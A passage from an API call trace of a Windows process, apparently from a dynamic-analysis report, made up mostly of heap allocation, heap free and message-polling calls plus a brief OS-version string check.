returned 1 [0112.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0112.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0112.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0112.642] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0112.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0112.642] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0112.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0112.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0112.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0112.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0112.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0112.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0112.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0112.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0112.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0112.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0112.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0112.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0112.643] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0112.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0112.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0112.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0112.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0112.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0112.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0112.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0112.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0112.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0112.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0112.643] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0112.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0112.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0112.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0112.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0112.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0112.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0112.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0112.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0112.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0112.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0112.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0112.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0112.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0112.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0112.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0112.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0112.644] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0112.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0112.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0112.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0112.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0112.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0112.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0112.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0112.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0112.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0112.644] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0112.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0112.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0112.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0112.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a684e8 [0112.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0112.645] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0112.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0112.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0112.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f40 [0112.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0112.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0112.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa018 [0112.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0112.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0112.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0112.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0112.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0112.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0112.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0112.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0112.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0112.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0112.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0112.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0112.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0112.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0112.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0112.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0112.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0112.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0112.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0112.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0112.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0112.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0112.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0112.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0112.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0112.646] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0112.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0112.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0112.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0112.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0112.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0112.646] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0112.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0112.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0112.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fe8 [0112.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0112.646] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0112.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0112.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0112.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0112.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0112.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0112.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0112.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0112.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0112.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0112.647] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0112.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0112.647] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0112.647] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0112.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0112.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0112.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0112.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0112.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0112.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0112.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0112.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0112.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0112.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0112.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0112.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0112.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0112.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0112.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0112.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0112.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0112.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0112.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0112.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0112.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0112.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0112.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0112.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0112.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0112.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0112.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0112.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0112.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0112.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0112.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0112.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0112.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0112.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0112.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0112.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0112.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0112.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0112.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0112.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0112.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0112.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0112.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0112.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0112.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0112.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0112.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0112.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0112.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0112.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0112.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0112.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0112.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0112.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0112.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0112.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0112.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0112.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0112.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0112.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0112.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0112.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 